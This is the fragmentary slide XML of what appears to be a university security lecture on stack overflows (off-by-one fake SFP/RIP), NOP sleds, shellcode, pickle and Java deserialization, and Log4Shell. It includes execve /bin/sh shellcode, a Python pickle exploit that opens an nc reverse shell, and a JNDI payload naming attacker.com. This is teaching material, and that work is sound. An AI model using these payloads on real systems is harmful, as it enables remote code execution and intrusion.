            <a:off x="2429959" y="282230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91" name="Google Shape;591;p55"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="590" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744959" y="294545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2" name="Google Shape;592;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="32060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93" name="Google Shape;593;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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4" name="Google Shape;594;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46957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ESP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95" name="Google Shape;595;p55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4832575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596" name="Google Shape;596;p55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 </a:t>
                      </a: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[Fake RIP of main]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 </a:t>
                      </a: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[Fake SFP of main]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97" name="Google Shape;597;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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The C program now thinks that the SFP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 and the RIP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 are inside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The attacker controls these values, so the attacker can now overwrite where the program thinks the RIP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 is.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98" name="Google Shape;598;p55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99" name="Google Shape;599;p55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" name="Google Shape;604;p56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05" name="Google Shape;605;p56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606" name="Google Shape;606;p56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7" name="Google Shape;607;p56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608" name="Google Shape;608;p56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09" name="Google Shape;609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610" name="Google Shape;610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56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12" name="Google Shape;612;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="32060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13" name="Google Shape;613;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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4" name="Google Shape;614;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="46957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ESP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15" name="Google Shape;615;p56"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4832575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616" name="Google Shape;616;p56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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1000">
                          <a:solidFill>
                            <a:srgbClr val="FF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[Fake SFP m]</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="FF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17" name="Google Shape;617;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="5541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 function returns.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18" name="Google Shape;618;p56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619" name="Google Shape;619;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429959" y="295877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20" name="Google Shape;620;p56"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="619" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744959" y="308192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1" name="Google Shape;621;p56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6" name="Google Shape;626;p57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27" name="Google Shape;627;p57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628" name="Google Shape;628;p57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9" name="Google Shape;629;p57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630" name="Google Shape;630;p57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31" name="Google Shape;631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632" name="Google Shape;632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3" name="Google Shape;633;p57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add $4, %esp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4" name="Google Shape;634;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493680" y="311117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35" name="Google Shape;635;p57"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="634" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808680" y="323432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6" name="Google Shape;636;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="32060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37" name="Google Shape;637;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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8" name="Google Shape;638;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="4410730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639" name="Google Shape;639;p57"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="458008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640" name="Google Shape;640;p57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 [Fake SFP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41" name="Google Shape;641;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="9234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 function returns.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Returning from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gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, preparing to return from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42" name="Google Shape;642;p57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643" name="Google Shape;643;p57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8" name="Google Shape;648;p58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49" name="Google Shape;649;p58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650" name="Google Shape;650;p58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1" name="Google Shape;651;p58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652" name="Google Shape;652;p58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53" name="Google Shape;653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654" name="Google Shape;654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58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mov %ebp, %esp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6" name="Google Shape;656;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493680" y="326357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57" name="Google Shape;657;p58"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="656" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808680" y="338672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8" name="Google Shape;658;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="3134321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59" name="Google Shape;659;p58"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="33753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0" name="Google Shape;660;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="3272243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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="661" name="Google Shape;661;p58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 [Fake SFP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62" name="Google Shape;662;p58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="9234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 function returns.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Epilogue step 1: Move ESP back up.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63" name="Google Shape;663;p58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664" name="Google Shape;664;p58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9" name="Google Shape;669;p59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70" name="Google Shape;670;p59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671" name="Google Shape;671;p59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59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673" name="Google Shape;673;p59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74" name="Google Shape;674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675" name="Google Shape;675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6" name="Google Shape;676;p59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pop %ebp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7" name="Google Shape;677;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493680" y="341597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678" name="Google Shape;678;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="677" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808680" y="353912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679" name="Google Shape;679;p59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 [Fake SFP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80" name="Google Shape;680;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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 function returns.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Epilogue step 2: Restore EBP. Note that EBP now points inside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lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, instead of at the SFP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81" name="Google Shape;681;p59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682" name="Google Shape;682;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="2961477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683" name="Google Shape;683;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="313082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4" name="Google Shape;684;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="44252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EBP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685" name="Google Shape;685;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="45945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6" name="Google Shape;686;p59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1" name="Google Shape;691;p60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92" name="Google Shape;692;p60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693" name="Google Shape;693;p60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4" name="Google Shape;694;p60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695" name="Google Shape;695;p60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96" name="Google Shape;696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697" name="Google Shape;697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8" name="Google Shape;698;p60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ret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99" name="Google Shape;699;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493680" y="417797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700" name="Google Shape;700;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="699" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808680" y="430112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701" name="Google Shape;701;p60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 [Fake SFP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02" name="Google Shape;702;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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 function returns.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Epilogue step 3: Restore EIP. We never changed the RIP of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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, so execution returns to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 as normal.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703" name="Google Shape;703;p60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704" name="Google Shape;704;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="2708982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705" name="Google Shape;705;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="2878324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6" name="Google Shape;706;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="44252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EBP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="707" name="Google Shape;707;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4594550"/>
            <a:ext cx="604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8" name="Google Shape;708;p60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3" name="Google Shape;713;p61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14" name="Google Shape;714;p61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715" name="Google Shape;715;p61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6" name="Google Shape;716;p61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717" name="Google Shape;717;p61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18" name="Google Shape;718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719" name="Google Shape;719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0" name="Google Shape;720;p61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mov %ebp, %esp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21" name="Google Shape;721;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493680" y="433037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722" name="Google Shape;722;p61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="721" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808680" y="445352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723" name="Google Shape;723;p61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 [Fake SFP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24" name="Google Shape;724;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="9234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 function returns, now with the EBP in the wrong place.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Epilogue step 1: Move ESP back up.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725" name="Google Shape;725;p61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726" name="Google Shape;726;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="4377417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sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Google Shape;727;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="450140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EBP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="728" name="Google Shape;728;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4594550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9" name="Google Shape;729;p61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4" name="Google Shape;734;p62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35" name="Google Shape;735;p62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736" name="Google Shape;736;p62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7" name="Google Shape;737;p62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738" name="Google Shape;738;p62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39" name="Google Shape;739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740" name="Google Shape;740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1" name="Google Shape;741;p62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mov %ebp,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42" name="Google Shape;742;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493680" y="448277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EIP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743" name="Google Shape;743;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="742" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808680" y="460592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744" name="Google Shape;744;p62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 [Fake SFP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45" name="Google Shape;745;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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 function returns, now with the EBP in the wrong place.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Epilogue step 2: Restore EBP. The program looks at our fake SFP to restore EBP, and points EBP to garbage AAAA.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746" name="Google Shape;746;p62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747" name="Google Shape;747;p62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EBP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748" name="Google Shape;748;p62"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="747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749" name="Google Shape;74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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="4156782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751" name="Google Shape;751;p62"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4326124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2" name="Google Shape;752;p62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" name="Google Shape;757;p63"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7212679" y="2518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m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7125">
                <a:tc gridSpan="4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v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58" name="Google Shape;758;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="7753350" y="39247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E9E9E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1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="9E9E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759" name="Google Shape;759;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8367750" y="3510425"/>
            <a:ext cx="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0" name="Google Shape;760;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8367750" y="4398425"/>
            <a:ext cx="0" cy="3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761" name="Google Shape;761;p63"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4837550" y="25106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291400"/>
                <a:gridCol w="382850"/>
                <a:gridCol w="382850"/>
                <a:gridCol w="382850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0xbfffcd60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0xbfffcd50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0xbfffcd4c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0xbfffcd48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0xbfffcd44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9E9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0xbfffcd40</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1000">
                        <a:solidFill>
                          <a:srgbClr val="9E9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62" name="Google Shape;762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Off-by-one</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="Google Shape;763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4" name="Google Shape;764;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2807925" y="2445675"/>
            <a:ext cx="1821000" cy="233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pop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mov %ebp,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 %ebp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5" name="Google Shape;765;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4193455" y="632420"/>
            <a:ext cx="315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EIP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766" name="Google Shape;766;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="765" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508455" y="755570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767" name="Google Shape;767;p63"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="59815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\x44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\xcd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\xff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\xbf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0xdeadbeef [Fake RIP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AAAA [Fake SFP m]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18275" marL="18275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768" name="Google Shape;768;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102700" y="1200500"/>
            <a:ext cx="4394400" cy="1108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Let’s see what happens when the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" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> function returns, now with the EBP in the wrong place.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Epilogue step 3: Restore EIP. The program looks at our fake RIP to restore EIP, and redirects execution to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en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0xdeadbeef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769" name="Google Shape;769;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8435100" y="3393150"/>
            <a:ext cx="485875" cy="1250525"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="50021" w="19435">
                <a:moveTo>
                  <a:pt x="8284" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19435" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19435" y="50021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5002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770" name="Google Shape;770;p63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771" name="Google Shape;771;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="770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772" name="Google Shape;77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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695775" y="3928182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774" name="Google Shape;774;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176675" y="4097524"/>
            <a:ext cx="604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5" name="Google Shape;775;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4870650" y="209675"/>
            <a:ext cx="1207200" cy="6951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sh # </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="12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_</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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76" name="Google Shape;776;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197418" y="3206000"/>
            <a:ext cx="2265000" cy="156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fread(name,21,1,stdin);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6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Robust Exploits</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Google Shape;782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NOP Sleds</a:t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Instead of having to jump to an exact address, make it “close enough” so that small shifts don’t break your exploit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NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Short for no-operation or no-op, an instruction that does nothing (except advance the EIP)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real instruction in x86, unlike RISC-V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Chaining a long sequence of NOPs means that landing anywhere in the sled will bring you to your shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789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0" name="Google Shape;790;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094250" y="1215625"/>
            <a:ext cx="1378200" cy="382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nop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xor %eax, %eax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push %eax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push $0x68732f2f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push $0x6e69622f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mov %esp, %ebx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mov %eax, %ecx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mov %eax, %edx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mov $0xb, %al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900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int $0x80</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="90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791" name="Google Shape;791;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7936950" y="1293275"/>
            <a:ext cx="0" cy="217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Serialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797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8" name="Google Shape;798;p66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No textbook chapter (yet!)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Serialization in Java and Python</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="804" name="Google Shape;804;p6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 safety vulnerabilities are almost exclusively in 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More on memory-safe languages next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Java and Python have a related problem: serialization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Serialization is a huge land-mine that is easy to trigger</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805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Log4Shell Vulnerability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="811" name="Google Shape;811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812" name="Google Shape;812;p68"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="288475" y="14317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{65D2A71D-632E-4485-A4D9-6FDEFA215159}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4283525"/>
                <a:gridCol w="4283525"/>
              </a:tblGrid>
              <a:tr h="341650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="20002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hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>Link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3416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What's the Deal with the Log4Shell Security Nightmare?</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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  <a:tr h="317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Nicholas Weaver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December 10, 2021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9373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We live in a strange world. What started out as a Minecraft prank, where a message in chat like </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="59595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${jndi:ldap://attacker.com/pwnyourserver}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="595959"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> would take over either a Minecraft server or client, has now resulted in a 5-alarm security panic as administrators and developers all over the world desperately try to fix and patch systems before the cryptocurrency miners, ransomware attackers and nation-state adversaries rush to exploit thousands of software packages. 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813" name="Google Shape;813;p68" title="Lawfar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225" y="1520799"/>
            <a:ext cx="1836800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6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Serialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;p6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Motivation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have some complex data structure (e.g. objects pointing to objects pointing to objects)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want to save your program state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Or you want to transfer this state to another running copy of your program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Option 1: Manually write and parse a custom file format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Problem: The code and the custom format are probably pretty ugly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Problem: Extra programming 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Problem: You may make errors in your parser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Option 2: Use a serialization library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Automatically converts any object into a file (and back)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serialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is a built-in Java function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pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is a built-in Python library</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="820" name="Google Shape;820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Serialization Vulnerabilities in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pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (Python)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p7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Serialization libraries can load and save arbitrary objects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Arbitrary objects might contain code that can be executed (e.g. functions)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the attacker provides a malicious file to be deserialized?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victim program loads a serialized file from the attacker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deserializing the object, the code from the attacker executes!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="827" name="Google Shape;827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pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (Python) exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833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4" name="Google Shape;834;p7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import base64, os, pickle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class RCE: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def __reduce__(self):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cmd = \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  'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f' \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  '/bin/sh -i 2&gt;&amp;1 | nc 127.0.0.1 1234 &gt; /tmp/f'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  return os.system, (cmd,)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:b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if __name__ == '__main__':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pickled = pickle.dumps(RCE())</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700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700">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  print(base64.b64encode(pickled).decode('ascii'))</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="17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Serialization Vulnerabilities in Java</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Google Shape;840;p7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Exploiting serialization is a little harder in Java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latest Java includes some protections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Deserialized code is not allowed to call certain libraries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Don't allow a deserialized object to invoke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java.lang.Runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and call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exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (which can execute arbitrary programs)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Sometimes called a denylist or blacklist, as we’ll see later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Problem: Denylists are </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>brittle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forget to include a dangerous library in your list, attackers can exploit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Attackers have automated tools to exploit this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Take a common runtime, find snippets of code (“gadgets”) that can be executed, and chain a series of snippets together to create a larger exploit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“ysoserial”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Google Shape;841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Log4j</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Google Shape;847;p7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Logging: Recording information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Being a good programmer, you want to record things that happen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Log4j: A very common Java framework for logging information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 if your Java code doesn’t use Log4j, you may be importing some third-party code that uses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Unfortunately, there was a bug added…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="848" name="Google Shape;848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9" name="Google Shape;84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6262" y="1194175"/>
            <a:ext cx="3006188" cy="38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Log4j and JNDI (Java Naming &amp; Directory Interface)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
